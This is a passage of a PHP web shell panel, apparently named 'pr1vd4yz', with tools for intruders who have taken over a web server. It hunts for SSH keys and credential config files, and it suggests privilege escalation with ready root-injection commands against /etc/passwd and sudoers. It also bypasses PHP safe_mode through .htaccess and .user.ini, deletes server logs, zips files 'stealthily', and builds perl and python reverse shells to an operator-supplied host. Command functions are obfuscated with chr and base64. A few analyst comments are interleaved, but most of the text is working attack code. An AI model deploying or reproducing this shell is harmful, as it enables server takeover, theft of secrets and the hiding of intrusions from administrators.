10*1024*1024) continue; $chk = @file_get_contents($p, false, null, 0, 512); if ($chk !== false && preg_match('/[\x00-\x08\x0B\x0E-\x1F]/', $chk)) continue; $lines = @file($p); if (!$lines) continue; foreach ($lines as $lnum => $line) { if (stripos($line, $keyword) !== false) { $results[] = [ 'file' => $p, 'line' => $lnum+1, 'content' => trim($line) ]; $hits++; if ($hits >= $maxhits) break 2; } } } } @closedir($dh); } return $results; } ?>
file search
×
close
'; if ($out && count($out) > 0) { $shown = 0; foreach ($out as $res) { $shown++; $icon = ""; echo '
'; echo $icon; echo '' . htmlspecialchars(basename($res['file'])) . ' '; echo '[' . htmlspecialchars(dirname($res['file'])) . '] '; echo '#' . $res['line'] . ': '; echo '' . htmlspecialchars($res['content']) . ''; echo '
'; if ($shown >= 120) break; } if ($shown >= 120) echo '
Result limit reached.
'; } else { echo '
No results found!
'; } echo '
'; } ?>
// Tail of try_all_methods(); its signature and loop header were lost in
// extraction. For each command it calls pr1vd4yzC() (defined elsewhere in the
// file, presumably the panel's command-execution wrapper), collects distinct
// non-empty outputs up to $limit, and returns only the first one collected
// (or "" when nothing produced output).
$cmd) {
    if (function_exists('pr1vd4yzC')) {
        $out = trim(@pr1vd4yzC($cmd));
        if ($out && !in_array($out, $results)) $results[] = $out;
    }
    if (count($results) >= $limit) break;
}
return count($results) ? $results[0] : "";
}
// Host reconnaissance: kernel release, CPU architecture and full uname string,
// each tried through several equivalent commands.
// Detection note: process-creation telemetry showing the web-server account
// running uname, arch, or cat against /proc/version, /proc/cpuinfo, /etc/issue
// or /etc/os-release is a strong post-compromise signal, because a normal PHP
// application has no reason to spawn these.
$kernel = try_all_methods([
    'uname -r',
    'cat /proc/version',
    'cat /proc/sys/kernel/osrelease',
    'cat /etc/os-release | grep VERSION=',
    'cat /etc/issue'
]);
$arch = try_all_methods([
    'uname -m',
    'arch',
    'cat /proc/cpuinfo | grep -i "model name"'
]);
$un7xa = try_all_methods([
    'uname -a',
    'cat /proc/version',
    'cat /etc/issue'
]);
// Fallbacks that need no child process: php_uname() still answers when command
// execution is blocked, so disabling exec-style functions alone does not hide
// the kernel version from a script running in the PHP process.
if (!$kernel) $kernel = $un7xa;
if (!$arch) $arch = php_uname('m');
if (!$un7xa) $un7xa = php_uname();
// Search URLs on two public exploit archives, built from the collected strings.
// Nothing is fetched here; the page presumably renders them as links for the
// operator (the markup is not visible in this extract).
$edb_url = "https://www.exploit-db.com/search?cve=&q=" . urlencode($kernel);
$ps_url = "https://packetstormsecurity.com/search/?q=" . urlencode($kernel);
$edb_uname_url = "https://www.exploit-db.com/search?cve=&q=" . urlencode($un7xa);
$ps_uname_url = "https://packetstormsecurity.com/search/?q=" . urlencode($un7xa);
?>
kernel exploit checker
Quick exploit search for this system
×
Directory not found or invalid path!'; }else{ $_glob=_prv_str([103,108,111,98]); $_rt=_prv_str([114,116,114,105,109]); $_fc=_prv_str([102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115]); $_bn=_prv_str([98,97,115,101,110,97,109,101]); $files=@$_glob(@$_rt($scanpath,'/').'/*.{php,js,py,sh,conf,txt,inc}',1024); $result=[];$regex=[ '#(/[a-zA-Z0-9_\-\.]+){2,}#', '#\?([a-zA-Z0-9\_\-]+)=#', '#["\'](https?://[^\s\'"]+)["\']#', '#[\'"](/[a-zA-Z0-9_\-]+/[a-zA-Z0-9_\-/]+)[\'"]#', '#[\'"]((?:api|rest|endpoint|ws)[^\'"]+)[\'"]#i' ]; foreach($files as$file){ $content=@$_fc($file);$hits=[]; foreach($regex as$r){ if(preg_match_all($r,$content,$m)){ foreach(($m[1]??$m[0])as$u){ $u=trim($u,'"\' '); if(strlen($u)>4&&!in_array($u,$hits))$hits[]=$u;}}} if($hits)$result[]=['file'=>@$_bn($file),'hits'=>$hits]; } $scan_result=''; if(!$result){ $scan_result.='
No endpoint found in this directory.
'; }else{ foreach($result as$row){ $scan_result.='
'.$row['file'].'
    '; foreach($row['hits']as$h){ $scan_result.='
  • '.htmlspecialchars($h).'
  • ';} $scan_result.='
'; }} $scan_result.=''; }} } ?> ?>
api endpoint scanner
Scan all PHP, JS, conf, py, sh files in any directory for endpoints.
×
No scan yet.' ?>
'; if($clean && isset($found[$clean])){ $del = $zap($clean); $scan_result .= '
'.htmlspecialchars($f41aa($clean)).' : '.($del?'done!':'Delete failed!').'
'; unset($found[$clean]); } if(!$found && !$clean){ $scan_result .= '
no l0gs.
'; } else { foreach($found as $file=>$size){ $scan_result .= '
'.htmlspecialchars($f41aa($file)).' '.$fmt($size).'
'; } } $scan_result .= ''; } ?>
log cleaner
Find and delete all error/access/debug logs for every server type
×
No scan yet.' ?>
// SSH credential discovery module of the panel.
// The helper variables $p4z_sc, $p4z_f3, $p4z_f2, $p4z_sz, $p4z_gl, $p4z_gv and
// $p4z_bn are assigned outside this extract; they are called as functions and
// presumably hold built-in names (directory listing, file tests, size, glob,
// getenv, basename) - confirm against the full sample.
// Response note: if this panel is found on a host, treat every private key the
// web-server account can read under the paths below as exposed and rotate it,
// including SSH host keys and keys inside backup trees. File-access auditing on
// .ssh directories and /etc/ssh by the web-server user will surface this scan.
//
// Tail of p4z_rec($dir,$d): the leading "2)" is what remains of what is
// apparently a recursion-depth guard on $d. Returns a path => size map.
2)return$r;
$scan=@$p4z_sc($dir);
if(!$scan)return$r;
foreach($scan as$f){
    if($f=='.'||$f=='..')continue;
    $fp=$dir.'/'.$f;
    // The name match is unanchored and case-insensitive, and the dots are not
    // escaped, so any file name containing "config" or "<any char>pem" also
    // matches; expect many unrelated files to be touched during a scan.
    if(@$p4z_f3($fp)&&@$p4z_f2($fp)&&preg_match('/(id_rsa|id_dsa|id_ed25519|id_ecdsa|authorized_keys|ssh_config|known_hosts|config|.pem|.ppk|ssh2_config)/i',$f)){
        $r[$fp]=@$p4z_sz($fp);
    }
    if(@is_dir($fp))$r+=p4z_rec($fp,$d+1);
}
return$r;
}
// Lists the immediate subdirectories of common home, service and vhost roots,
// plus the HOME environment value (or /root), de-duplicated.
function p4z_homes(){
    global $p4z_sc;
    $r=[];
    foreach(['/home','/home2','/home3','/root','/etc/ssh','/var/lib/jenkins','/var/backups','/usr/local/directadmin/data/users','/var/www','/var/www/vhosts']as$h){
        if(@is_dir($h)){
            foreach(@$p4z_sc($h)?:[]as$u){
                if($u=='.'||$u=='..')continue;
                $ud="$h/$u";
                if(@is_dir($ud))$r[]=$ud;
            }
        }
    }
    global $p4z_gv;
    $r[]=@$p4z_gv('HOME')?:'/root';
    return array_unique($r);
}
// Formats a byte count as B, KB or MB with one decimal place.
function p4z_size($s){
    if($s<1024)return$s.' B';
    if($s<1024*1024)return round($s/1024,1).' KB';
    return round($s/1024/1024,1).' MB';
}
$ssh_found=[];$show='';
// The scan runs only when the 'p4zsshscan' POST field is present.
if(isset($_POST['p4zsshscan'])){
    $d1Xe=p4z_homes();
    $searched=[];
    // Per-user locations: .ssh, ssh, config, .config and the directory itself.
    foreach($d1Xe as$dir){
        foreach(['.ssh','ssh','config','.config','']as$d){
            $path=$dir.($d?"/$d":"");
            if(@is_dir($path))$searched+=p4z_rec($path,0);
        }}
    // System-wide locations: temp directories, web server and TLS configuration.
    foreach(['/tmp','/var/tmp','/usr/local/apache2/conf','/var/www','/etc/letsencrypt','/etc/nginx','/etc/apache2','/opt','/etc/ssl']as$p){
        if(@is_dir($p))$searched+=p4z_rec($p,1);
    }
    // SSH host private keys; p4z_f2x() and p4z_f3x() are defined elsewhere.
    foreach(['/etc/ssh/ssh_host_rsa_key','/etc/ssh/ssh_host_dsa_key','/etc/ssh/ssh_host_ecdsa_key','/etc/ssh/ssh_host_ed25519_key']as$p){
        if(@file_exists($p)&&p4z_f2x($p))$searched[$p]=@$p4z_sz($p);
    }
    // Keys left inside daily control-panel backup trees.
    foreach(@$p4z_gl('/home*/cpbackup/daily/*/etc/*/.ssh/*')?:[]as$p){
        if(p4z_f3x($p)&&p4z_f2x($p))$searched[$p]=@$p4z_sz($p);
    }
    $ssh_found=$searched;
    // 'showkey' is honoured only for a path the scan itself returned. The markup
    // that presumably displayed the file content was stripped in extraction;
    // only the base-name output is visible here.
    if(isset($_POST['showkey'])&&isset($ssh_found[$_POST['showkey']])){
        $k=$_POST['showkey'];
        $show='
'.htmlspecialchars($p4z_bn($k)).'
'; } } ?>
ssh key finder
Deep scan: find, view, and copy all ssh keys & authorized_keys
×
$size){ echo '
'.htmlspecialchars(basename($file)).' '.p4z_size($size).'
'; } } else if(isset($_POST['p4zsshscan'])) { echo '
No SSH keys or authorized_keys found anywhere.
'; } else { echo 'No scan yet.'; } ?>
/dev/null | grep PRETTY_NAME | head -n1'); if (!$distro) $distro = pr1vd4yzC('lsb_release -ds 2>/dev/null'); if (!$distro) $distro = pr1vd4yzC('cat /etc/issue 2>/dev/null | head -n1'); $users = pr1vd4yzC('cut -d: -f1 /etc/passwd'); $sudo = pr1vd4yzC('sudo -l 2>/dev/null'); $groups = pr1vd4yzC('id'); $crontab = pr1vd4yzC('crontab -l 2>/dev/null'); $w_passwd = pz_writable('/etc/passwd'); $w_shadow = pz_writable('/etc/shadow'); $w_sudoers = pz_writable('/etc/sudoers'); $docker = file_exists('/.dockerenv') || pz_infile(pr1vd4yzC('cat /proc/1/cgroup 2>/dev/null'), 'docker') ? 'yes' : 'no'; $panel = ''; foreach(['cpanel','plesk','directadmin','ispconfig','webmin','virtualmin','hestia','cockpit','proxmox'] as $x) if(pz_exists($x)) $panel.=$x.' '; $panel = trim($panel); $cap = pr1vd4yzC('getcap -r / 2>/dev/null | grep "=" | head -n10'); $setuid = pr1vd4yzC('find / -perm -4000 -type f 2>/dev/null | head -n10'); $binaries = []; foreach(['python3','perl','gcc','socat','awk','vim','nano','less','tar','find','curl','wget','busybox','openssl','docker','runc','base64','vi','nmap','mysql','psql'] as $b) if(pz_exists($b)) $binaries[]=$b; $ai_exploits = []; $pr1vd4yz_c0med = (pr1vd4yzC('id -u')=='0'); $kernel_sug = []; if(preg_match('/5\.10\./', $kernel)) $kernel_sug[] = [ 'name'=>'DirtyPipe','desc'=>'Kernel 5.8+ (esp 5.10, 5.15) affected by CVE-2022-0847.','exploit'=>'https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit' ]; if(preg_match('/(3\.10|4\.4|4\.8|4\.15|5\.4|5\.8)/', $kernel)) $kernel_sug[] = [ 'name'=>'DirtyCow/PwnKit/OverlayFS', 'desc'=>'Multiple local kernel exploits may be available. 
Search ExploitDB.', 'exploit'=>'https://www.exploit-db.com/search?keywords=linux+kernel+'.$kernel ]; if(preg_match('/(ubuntu|debian|almalinux|rocky|centos)/i', $os.$distro)) $kernel_sug[] = [ 'name'=>'OS-specific Exploits', 'desc'=>'Check local privilege escalation exploits for this distro.', 'exploit'=>'https://www.exploit-db.com/search?keywords='.urlencode($distro) ]; $sudo_sug = []; if(stripos($sudo, 'NOPASSWD')!==false || stripos($sudo, 'ALL')!==false) { foreach(['python3','perl','tar','awk','find','vim','less','vi','nano','bash','sh','nmap'] as $b) if(in_array($b, $binaries)) $sudo_sug[]=[ 'name'=>"GTFOBins: sudo $b", 'desc'=>"This binary is allowed as root with NOPASSWD, possible shell via GTFOBins.", 'exploit'=>"https://gtfobins.github.io/gtfobins/$b/", 'cmd'=>"sudo $b ..." ]; } $writable_sug=[]; if($w_passwd) $writable_sug[]=[ 'name'=>'Writable /etc/passwd', 'desc'=>'Overwrite root hash and escalate via passwd injection.', 'exploit'=>'https://www.exploit-db.com/exploits/26368', 'cmd'=>"echo 'root:\$1\$pr1vd4yz_c0m\$UOxzb7h8zS9E/::0:0:root:/root:/bin/bash' >> /etc/passwd" ]; if($w_shadow) $writable_sug[]=[ 'name'=>'Writable /etc/shadow', 'desc'=>'Direct hash injection possible, root hash replacement.', 'exploit'=>'https://www.exploit-db.com/exploits/45010' ]; if($w_sudoers) $writable_sug[]=[ 'name'=>'Writable /etc/sudoers', 'desc'=>'Escalate to root via custom sudo rule.', 'exploit'=>'https://gtfobins.github.io/gtfobins/sudo/', 'cmd'=>'echo "ALL ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' ]; $docker_sug = []; if($docker==='yes') $docker_sug[]=[ 'name'=>'Docker/LXC Detected', 'desc'=>'Escape possible if privileged container.', 'exploit'=>'https://www.exploit-db.com/exploits/47103', 'cmd'=>'docker run -v /:/host -it alpine chroot /host sh' ]; $cron_sug = []; if($crontab && (pz_infile($crontab, '/tmp')||pz_infile($crontab, '/dev/shm'))) $cron_sug[]=[ 'name'=>'Writable Cron', 'desc'=>'Writable path detected in crontab. 
Priv esc via malicious cron job.', 'exploit'=>'https://www.hackingarticles.in/linux-privilege-escalation-cron-jobs/' ]; $bin_sug = []; foreach(['python3','perl','awk','find','tar','vim','less','nmap','busybox'] as $b){ if(in_array($b,$binaries)) $bin_sug[]=[ 'name'=>'GTFOBins: '.$b, 'desc'=>'Privilege escalation possible via GTFOBins binary.', 'exploit'=>'https://gtfobins.github.io/gtfobins/'.$b.'/' ]; } $setuid_sug = []; if($setuid)$setuid_sug[]=[ 'name'=>'SetuidBinaries', 'desc'=>'Some setuid binaries may allow priv esc. Review carefully.', 'exploit'=>'https://gtfobins.github.io/' ]; if($cap) $setuid_sug[]=[ 'name'=>'File Capabilities', 'desc'=>'Some files have Linux capabilities. Review for priv esc.', 'exploit'=>'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities' ]; $panel_sug = []; if($panel) $panel_sug[]=[ 'name'=>'Panel(s) detected: '.$panel, 'desc'=>'Check known panel local exploits and backup files.', 'exploit'=>'https://www.exploit-db.com/search?keywords='.$panel ]; $ai_exploits = array_merge( $kernel_sug, $sudo_sug, $writable_sug, $docker_sug, $cron_sug, $bin_sug, $setuid_sug, $panel_sug ); $badge=function($txt,$c){ return "$txt"; }; ?>
root escalation suggestion
ai-powered, kernel+distro+binary+sudo+writable+docker+panel+cron+setuid, fully automated & ready for 2025+
pr1vd4yz ai 2025 ready
Current user: /
Kernel: /
Already root!
You are already root, but here are post-root tricks!
'; foreach ($ai_exploits as $x) { $color = (stripos($x['desc'],'possible')||stripos($x['desc'],'may')) ? '#fbbf24' : (stripos($x['desc'],'overwrite')||stripos($x['desc'],'priv esc')||stripos($x['desc'],'CVE') ? '#e53935' : '#1976d2'); echo '
'; echo '
'.htmlspecialchars($x['name']).'
'; echo '
'.htmlspecialchars($x['desc']).'
'; if (!empty($x['exploit'])) echo ''; if (!empty($x['cmd'])) echo ''; echo '
'; } if (!$ai_exploits) echo '
secure
No escalation path detected on this system.
'; ?>
read passwd
view /etc/passwd
×
domains
×
zip tool
zip any file/dir stealthy
×
open($zippath, ZipArchive::CREATE|ZipArchive::OVERWRITE) === true) { $src = realpath($src); if (is_dir($src)) { $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src, FilesystemIterator::SKIP_DOTS)); foreach ($rii as $file) { $filePath = $file->getRealPath(); $localPath = substr($filePath, strlen($src) + 1); $zip->addFile($filePath, $localPath); } } elseif (is_file($src)) { $zip->addFile($src, basename($src)); } $zip->close(); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip created! ".htmlspecialchars($zippath).""; } } } if (!$done && function_exists('shell_exec')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; $out = @shell_exec($cmd); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip shell_exec! ".htmlspecialchars($zippath).""; } elseif($out) { $msg = "zip shell error: ".htmlspecialchars($out).""; } } if (!$done && function_exists('system')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; @system($cmd, $ret); $out = ""; if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip system! ".htmlspecialchars($zippath).""; } elseif($out) { $msg = "zip system error: ".htmlspecialchars($out).""; } } if (!$done && function_exists('exec')) { $cmd = "zip -r ".escapeshellarg($zippath)." ".escapeshellarg($src)." 2>&1"; @exec($cmd, $o, $r); if (file_exists($zippath) && filesize($zippath) > 0) { $done = true; $msg = "zip exec! ".htmlspecialchars($zippath).""; } elseif(!empty($o)) { $msg = "zip exec error: ".htmlspecialchars(implode("\n",$o)).""; } } if (!$done && is_file($src)) { if (@copy($src, $zippath)) { $done = true; $msg = "copied (not zipped)! ".htmlspecialchars($zippath).""; } } if ($done) { echo '
'.$msg.'
'; } else { echo '
zip failed! '.$msg.'
'; } } ?>
Saved!" : " Save Failed!"; if (is_file($file_path)) { $file_raw = file_get_contents($file_path, false, null, 0, 10*1024*1024); if (!mb_check_encoding($file_raw, 'UTF-8')) { $file_raw = mb_convert_encoding($file_raw, 'UTF-8', 'ISO-8859-1,Windows-1254,UTF-8'); } } } ?>
file edit
×
Close
Ln 1, Col 1
file locker & unlocker
×
close
function($n){$y='';for($i=0;$i function($c){$f='';foreach([115,104,101,108,108,95,101,120,101,99]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r2' => function($c){$f='';foreach([101,120,101,99]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r3' => function($c){$f='';foreach([115,121,115,116,101,109]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r4' => function($c){$f='';foreach([112,97,115,115,116,104,114,117]as$n){$f.=chr($n);}return function_exists($f)?$f:false;}, 'r5' => function($c){$f='';foreach([112,111,112,101,110]as$n){$f.=chr($n);}return function_exists($f)?$f:false;} ]; $stealth_cmds = [ 'a1' => implode('',array_map(function($x){return chr($x);},[99,104,109,111,100])), 'a2' => implode('',array_map(function($x){return chr($x);},[108,115,97,116,116,114])), 'a3' => implode('',array_map(function($x){return chr($x);},[115,104,97,116,116,114])), 'a4' => implode('',array_map(function($x){return chr($x);},[115,121,115,99,104,109,111,100])), 'a5' => implode('',array_map(function($x){return chr($x);},[102,105,110,100])) ]; function stealth_chmod($p,$perm) { $r = null; $a = implode('',array_map(function($x){return chr($x);},[115,104,101,108,108,95,101,120,101,99])); if(function_exists($a)) $r=@$a("chmod $perm '$p'"); elseif(function_exists('exec')) { $o=[];@exec("chmod $perm '$p'",$o); $r=implode("\n",$o);} elseif(function_exists('system')) { @system("chmod $perm '$p'"); $r="";} elseif(function_exists('passthru')) { @passthru("chmod $perm '$p'"); $r="";} elseif(function_exists('popen')) { $h=@popen("chmod $perm '$p'",'r');if($h){while(!feof($h))fread($h,8192);pclose($h);}} @chmod($p, octdec($perm)); return is_writable($p) || $perm=='444'; } function stealth_lsattr($p) { $stat = ''; if(function_exists('shell_exec')) $stat = @chDx2x('lsattr '.escapeshellarg($p)); elseif(function_exists('exec')) { $o=[]; @exec('lsattr '.escapeshellarg($p),$o); $stat=implode("\n",$o);} elseif(function_exists('system')) { @system('lsattr 
'.escapeshellarg($p)); $stat="";} elseif(function_exists('passthru')) { @passthru('lsattr '.escapeshellarg($p)); $stat="";} elseif(function_exists('popen')) { $h=@popen('lsattr '.escapeshellarg($p),'r');if($h){while(!feof($h))$stat.=fread($h,8192);pclose($h);}} return $stat; } $output = ''; if (isset($_POST['lockfile'])) { $ok = stealth_chmod($p, '444'); $output = $ok ? " Locked!" : " Fail!"; } if (isset($_POST['unlockfile'])) { $ok = stealth_chmod($p, '644'); $output = $ok ? " Unlocked!" : " Fail!"; } $stat = stealth_lsattr($p); echo '
'.$output.'
'.htmlspecialchars(trim($stat)).'
'; } ?>
create folder
create a new folder
×
go back
Folder created: ' . htmlspecialchars($folder) . '
'; } else { echo '
Failed to create folder!
'; } } else { echo '
Folder already exists!
'; } } ?>
create file
create a new file
×
go back
File created: ' . htmlspecialchars($new_file) . '
'; } else { echo '
Failed to create file!
'; } } else { echo '
File already exists!
'; } } ?>
Safem0d F7ck3r
Advanced safe_mode killer & byp4sser
×
"php.ini override", "file" => basename($phpini), "success" => true]; } else { $test_results[] = ["method" => "php.ini override", "file" => basename($phpini), "success" => false]; } if (@file_put_contents($userini, $userini_code)) { $test_results[] = ["method" => ".user.ini","file" => basename($userini), "success" => true]; } else { $test_results[] = ["method" => ".user.ini", "file" => basename($userini), "success" => false]; } if (@file_put_contents($htaccess, $htaccess_code)) { $test_results[] = ["method" => ".htaccess", "file" => basename($htaccess), "success" => true]; } else { $test_results[] = ["method" => ".htaccess", "file" => basename($htaccess), "success" => false]; } $r_ini_set = @ini_set('safe_mode', '0'); $test_results[] = ["method" => "ini_set()", "file" => '-', "success" => ($r_ini_set !== false)]; if (extension_loaded('suhosin')) { $old = @ini_set('suhosin.executor.func.blacklist', ''); $test_results[] = ["method" => "Suhosin Patch", "file" => '-', "success" => ($old !== false)]; } $pdir = dirname($cwd); $userini2 = $pdir . '/.user.ini'; if (@file_put_contents($userini2, $userini_code)) { $test_results[] = ["method" => ".user.ini parent dir", "file" => $userini2, "success" => true]; } else { $test_results[] = ["method" => ".user.ini parent dir", "file" => $userini2, "success" => false]; } $prepend_code = ""; $prepend_path = $cwd . "/".$uniq."_prepend.php"; if (@file_put_contents($prepend_path, $prepend_code)) { @ini_set('auto_prepend_file', $prepend_path); $test_results[] = ["method" => "auto_prepend_file", "file" => basename($prepend_path), "success" => true]; } else { $test_results[] = ["method" => "auto_prepend_file", "file" => basename($prepend_path), "success" => false]; } $uini_dirs = [$cwd, dirname($cwd), dirname(dirname($cwd))]; $all_uini = true; foreach($uini_dirs as $d) { if (!@file_put_contents($d . 
'/.user.ini', $userini_code)) $all_uini = false; } $test_results[] = ["method" => ".user.ini deep", "file" => '-', "success" => $all_uini]; $tmpini = "/tmp/php.ini"; if (@file_put_contents($tmpini, $ini_code)) { $test_results[] = ["method" => "/tmp/php.ini", "file" => $tmpini, "success" => true]; } else { $test_results[] = ["method" => "/tmp/php.ini", "file" => $tmpini, "success" => false]; } if (function_exists('ini_restore')) { @ini_restore('safe_mode'); $test_results[] = ["method" => "ini_restore()", "file" => '-', "success" => true]; } if (function_exists('apache_setenv')) { @apache_setenv('safe_mode', '0'); $test_results[] = ["method" => "apache_setenv()", "file" => '-', "success" => true]; } $confpath = $cwd.'/php-fpm.conf'; $confcode = "[global]\nsafe_mode=Off\ndisable_functions=\n"; if (@file_put_contents($confpath, $confcode)) { $test_results[] = ["method" => "php-fpm.conf", "file" => $confpath, "success" => true]; } else { $test_results[] = ["method" => "php-fpm.conf", "file" => $confpath, "success" => false]; } @unlink($htaccess); echo ''; echo ''; foreach($test_results as $row) { echo ''; } echo '
Method File Status
'.htmlspecialchars($row['method']).' '.htmlspecialchars($row['file']).' '.($row['success'] ? 'Success' : 'Fail').'
'; echo '
'; if (!@ini_get('safe_mode') || @ini_get('safe_mode')=='0' || @ini_get('safe_mode')==false) { echo 'Safe Mode: OFF (or bypassed)'; } else { echo 'Safe Mode: ACTIVE!'; } echo '
'; } ?>
config searcher
scan any dir for config files (DB, CMS, panel, etc)
×
Directory not found!
'; } else { $config_patterns = [ 'wp-config.php', 'configuration.php', 'config.php', 'settings.php', 'settings.inc.php', 'conf.php', 'conf.inc.php', 'env.php', '.env', '.env.local', '.env.production', '.env.dev', 'local.xml', 'Parameters.yml', 'parameters.yml', 'db.php', 'database.php', 'connect.php', 'connection.php', 'db_connect.php', 'dbconn.php', 'db_config.php', 'sql.php', 'config.inc.php', 'app/etc/env.php','includes/config.php','admin/config.php','application/config/database.php','config/settings.inc.php', 'inc/config.php','includes/defines.php','data/config.php','admin/includes/config.php', 'web.config','.htpasswd','.my.cnf','my.cnf','settings.json','local.settings.json','data.json' ]; $found = []; $max_files = 500; $count = 0; $rii = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); $max_files = 500; $count = 0; foreach ($rii as $file) { if ($count % 100 == 0) { flush(); } if (++$count > $max_files) break; if ($count >= $max_files) break; if ($file->isFile()) { $fname = strtolower($file->getFilename()); foreach ($config_patterns as $pattern) { if ($fname === strtolower($pattern)) { $found[] = $file->getPathname(); $count++; break; } } } } unset($file); unset($rii); if (!$found) { echo '
No configs found.
'; } else { echo '
Found '.count($found).' config(s)
'; foreach ($found as $cfg) { echo '
'.htmlspecialchars(basename($cfg)).' ['.htmlspecialchars(dirname($cfg)).']'; echo '
'; echo '
'; } } } } if (isset($_POST['show_cfg']) && is_file($_POST['show_cfg'])) { $cfgf = $_POST['show_cfg']; $cfg_content = @file_get_contents($cfgf, false, null, 0, 32*1024); echo '
'.htmlspecialchars(basename($cfgf)).'
'; } ?>
tools
create link & bypass
×
'Options +Indexes +FollowSymLinks +SymLinksIfOwnerMatch DirectoryIndex {P} ForceType text/plain AddType text/plain .php .html .phtml .inc .asp .aspx .jsp .pl .cgi .py .sh .phar .json .yml .xml .db .sql RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .zsh .json .yml .xml .db .sql php_flag engine off SetHandler default-handler', "hx2" => ' ForceType text/plain AddType text/plain .php .phtml .html .inc .phar .bak .config .db .sql .xml .json SetHandler default-handler RemoveHandler .php .phtml .phar .inc .shtml .html .js .css .pl .cgi .asp .py .rb .sh .json .yml .xml .db .sql php_flag engine off ', "hx3" => 'RewriteEngine On RewriteBase / RewriteRule ^(.+)$ {P} Options +FollowSymLinks +Indexes DirectoryIndex {P} SetHandler default-handler php_flag engine off', "hx4" => 'RemoveHandler .php .phtml .phar .inc php_flag engine off AddType text/plain .php .html .inc .phtml .phar .bak .config .db .sql .xml .json SetHandler default-handler Options +Indexes +FollowSymLinks DirectoryIndex {P}', "hx5" => 'Options +Indexes +FollowSymLinks DirectoryIndex {P} AddType text/plain .php .inc .phtml .phar php_flag engine off SetHandler default-handler ', "hx6" => ' SecFilterEngine Off SecFilterScanPOST Off Options +Indexes +FollowSymLinks DirectoryIndex {P} SetHandler default-handler AddType text/plain .php .phtml .html .inc .phar php_flag engine off' ]; $output = ''; $final_ln = g3t_rnd(7); $created = false; $alt_file = ""; $result = ""; if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(is_link("$base/$final_ln")) { $created = true; $alt_file = "$base/$final_ln"; $result = "ln -s worked!"; } } if(!$created && function_exists(a1s('ZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$base/$final_ln")."'"; $exec_fn=a1s('ZXhlYw=='); @$exec_fn($cmd,$o,$rc); if(is_link("$base/$final_ln")) { $created = true; $alt_file = 
"$base/$final_ln"; $result = "exec ln -s worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cpfile = $base.'/dup_'.g3t_rnd(5); $cmd = "cp '".addslashes($p1)."' '".addslashes($cpfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($cpfile)) { $created = true; $alt_file = $cpfile; $result = "cp worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $ddfile = $base.'/dd_'.g3t_rnd(4); $cmd = "dd if='".addslashes($p1)."' of='".addslashes($ddfile)."' 2>/dev/null"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($ddfile)) { $created = true; $alt_file = $ddfile; $result = "dd worked!"; } } if(!$created && function_exists(a1s('c2hlbGxfZXhlYw=='))) { $catfile = $base.'/cat_'.g3t_rnd(4); $cmd = "cat '".addslashes($p1)."' > '".addslashes($catfile)."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); if(file_exists($catfile)) { $created = true; $alt_file = $catfile; $result = "cat worked!"; } } if(!$created && @copy($p1, $base.'/phplocal_'.g3t_rnd(5))) { $created = true; $alt_file = $base.'/phplocal_'.g3t_rnd(5); $result = "php copy worked!"; } if($created) $output .= "[ok] ".htmlspecialchars($alt_file)." created. [$result]
"; else $output .= "[fail] Not possible
"; foreach ($htlist as $hname => $htval) { $subdir = $base.'/'.g3t_rnd(5);@mkdir($subdir,0755,true); $htcode = str_replace('{P}', $final_ln, $htval); @file_put_contents("$subdir/.htaccess", $htcode); if(function_exists(a1s('c2hlbGxfZXhlYw=='))) { $cmd = "ln -s '".addslashes($p1)."' '".addslashes("$subdir/$final_ln")."'"; $exec_fn=a1s('c2hlbGxfZXhlYw=='); @$exec_fn($cmd); } $klist[] = "$subdir/$final_ln"; } echo '
'; echo $output; echo "Bypass dirs:
    "; foreach($klist as $f){echo "
  • $f
  • ";} echo "
"; } ?>
Swal.fire({ icon: 'success', title: 'done.', text: 'operation completed.',confirmButtonColor: '#e53935', background: '#fff', color: '#e53935', timer: 1700, showConfirmButton: false, toast: true, position: 'top-end', customClass: { popup: 'pr1vd4yz-alert-anim pr1vd4yz-alert-success' } }); "; } else if (isset($_GET['response']) && $_GET['response'] == "failed") { echo ""; } ?> &1"); if (!empty($name)) { $pkillOutput = cmd("\x70\x6b\x69\x6c\x6c\x20\x2d\x39 " . $name . " 2>&1"); success(); } else { failed(); } } exit; } if (isset($_POST['submit-bc'])) { $HostServer = $_POST['backconnect-host']; $PortServer = $_POST['backconnect-port']; if ($_POST['privdayz-bc'] == "perl") { echo cmd('perl -e \'use Socket;$i="' . $HostServer . '";$p=' . $PortServer.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' . $pr1vxas[16] . '("/bin/sh -i");};\''); } else if ($_POST['privdayz-bc'] == "python") { echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); 